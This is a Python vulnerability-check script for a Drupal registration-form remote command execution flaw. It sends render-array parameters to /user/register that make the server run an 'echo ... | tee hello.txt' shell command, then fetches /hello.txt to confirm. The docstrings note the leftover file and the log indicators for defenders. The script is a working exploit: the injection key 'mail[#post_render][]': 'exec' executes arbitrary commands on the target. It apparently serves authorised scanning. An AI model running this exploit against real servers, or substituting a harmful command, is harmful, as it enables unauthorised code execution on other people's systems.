#!/usr/bin/env python3
#coding: utf-8
import requests
import sys

import argparse
from json_parse import Jsonparse


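class DrupalScanner(object):
    """Active check for a Drupal registration-form command execution flaw.

    The check is intrusive: it POSTs render-array parameters to
    ``/user/register`` that ask the server to run a shell ``echo`` writing
    ``hello.txt``, then fetches ``/hello.txt`` and looks for the marker text.

    Points an operator or reviewer should know:

    * A positive result leaves ``hello.txt`` on the scanned host; nothing in
      this class removes it, so it has to be cleaned up separately.
    * The marker text is fixed, so a ``hello.txt`` left by an earlier run
      makes a since-patched host still report as exploitable.
    * Only plain ``http://`` is used, so ``verify=True`` has no effect here.
    * On the defending side, the probe shows up in web logs as a POST to
      ``/user/register`` carrying ``element_parents`` and ``ajax_form`` in
      the query string, with ``#post_render`` keys in the form body.

    The process exit status is the result channel: ``EXIT_EXPLOITABLE``,
    ``EXIT_NOT_EXPLOITABLE`` or ``EXIT_ERROR``.
    """

    # Exit statuses, unchanged from the original script.
    EXIT_ERROR = -1
    EXIT_EXPLOITABLE = 233
    EXIT_NOT_EXPLOITABLE = 1

    MARKER = "drupal success"

    def __init__(self, ip, port, level):
        """Store the target.

        Args:
            ip: Host name or address of the target.
            port: TCP port of the web server.
            level: Passed to ``requests`` as the per-request timeout.
        """
        self.ip = ip
        self.port = port
        self.level = level

    def run(self):
        """Send the probe, verify the marker file and exit with the result.

        This method does not return; it always terminates the process via
        ``sys.exit``.
        """
        tg = 'http://' + str(self.ip) + ':' + str(self.port)
        verify = True
        url = tg + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
        payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "drupal success" | tee hello.txt'}
        try:
            # The POST response body is not needed; only the follow-up GET
            # decides the verdict.
            requests.post(url, data=payload, timeout=self.level, verify=verify)
            check = requests.get(tg + '/hello.txt', timeout=self.level, verify=verify)
        except Exception as e:
            # Script boundary: every failure of either request must map to
            # EXIT_ERROR. Previously a failed GET escaped as a traceback, and
            # the interpreter's exit status 1 for an uncaught exception is the
            # same value as "Not exploitable", turning a network error into a
            # false negative.
            print(e)
            sys.exit(self.EXIT_ERROR)

        if self.MARKER in check.text:
            print(str(self.ip) + ": exploitable")
            sys.exit(self.EXIT_EXPLOITABLE)

        print(str(self.ip) + ": Not exploitable")
        sys.exit(self.EXIT_NOT_EXPLOITABLE)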

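if __name__ == '__main__':
    # Command line: <base_dir> <target_host> <port>
    #   base_dir - directory that contains poc\lib\config.json
    #   target   - host name or address to check
    #   port     - TCP port of the web server
    #
    # Argument problems exit with -1, the same error status DrupalScanner.run
    # uses. An uncaught IndexError/ValueError would end the process with
    # status 1, which is also the "Not exploitable" status, so a mistyped
    # invocation would be read as a clean result.
    if len(sys.argv) < 4:
        print('usage: ' + sys.argv[0] + ' <base_dir> <target> <port>')
        sys.exit(-1)

    try:
        port = int(sys.argv[3])
    except ValueError:
        print('invalid port: ' + sys.argv[3])
        sys.exit(-1)

    # NOTE(review): the backslash-separated suffix only resolves on Windows;
    # kept as-is because the surrounding tooling is not visible from here.
    jsonfile = sys.argv[1] + '\\poc\\lib\\config.json'
    jsonobj = Jsonparse(jsonfile)
    jsondata = jsonobj.parse()
    target = sys.argv[2]
    # The configured timeout is what DrupalScanner receives as `level`.
    timeout = jsondata['timeout']
    scanner = DrupalScanner(target, port, timeout)
    scanner.run()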